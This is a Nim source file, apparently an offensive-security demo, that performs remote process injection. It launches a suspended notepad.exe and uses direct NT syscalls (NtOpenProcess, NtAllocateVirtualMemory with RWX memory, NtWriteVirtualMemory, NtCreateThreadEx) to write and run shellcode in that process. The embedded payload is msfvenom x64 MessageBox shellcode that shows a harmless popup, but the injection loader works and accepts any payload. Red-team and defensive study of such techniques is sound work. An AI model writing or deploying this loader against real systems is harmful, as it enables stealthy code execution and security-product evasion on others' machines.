#[ Author: Marcello Salvati, Twitter: @byt3bl33d3r License: BSD 3-Clause ]# import winim/lean import osproc include syscalls proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void = # Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D let tProcess = startProcess("notepad.exe") tProcess.suspend() # That's handy! defer: tProcess.close() echo "[*] Target Process: ", tProcess.processID var cid: CLIENT_ID var oa: OBJECT_ATTRIBUTES var pHandle: HANDLE var tHandle: HANDLE var ds: LPVOID var sc_size: SIZE_T = cast[SIZE_T](shellcode.len) cid.UniqueProcess = tProcess.processID var status = NtOpenProcess( &pHandle, PROCESS_ALL_ACCESS, &oa, &cid ) echo "[*] pHandle: ", pHandle status = NtAllocateVirtualMemory( pHandle, &ds, 0, &sc_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); var bytesWritten: SIZE_T status = NtWriteVirtualMemory( pHandle, ds, unsafeAddr shellcode, sc_size-1, addr bytesWritten); echo "[*] WriteProcessMemory: ", status echo " \\-- bytes written: ", bytesWritten echo "" status = NtCreateThreadEx( &tHandle, THREAD_ALL_ACCESS, NULL, pHandle, ds, NULL, FALSE, 0, 0, 0, NULL); status = NtClose(tHandle) status = NtClose(pHandle) echo "[*] tHandle: ", tHandle echo "[+] Injected" when defined(windows): # https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler when defined(i386): echo "[!] This is only for 64-bit use. Exiting..." return elif defined(amd64): # ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays echo "[*] Running in x64 process" var shellcode: array[295, byte] = [ byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51, 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48, 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48, 0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02, 0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e, 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88, 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48, 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e, 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41, 0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24, 0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e, 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41, 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1, 0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d, 0x85,0x0f,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff, 0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c, 0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d, 0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00] # This is essentially the equivalent of 'if __name__ == '__main__' in python when isMainModule: injectCreateRemoteThread(shellcode)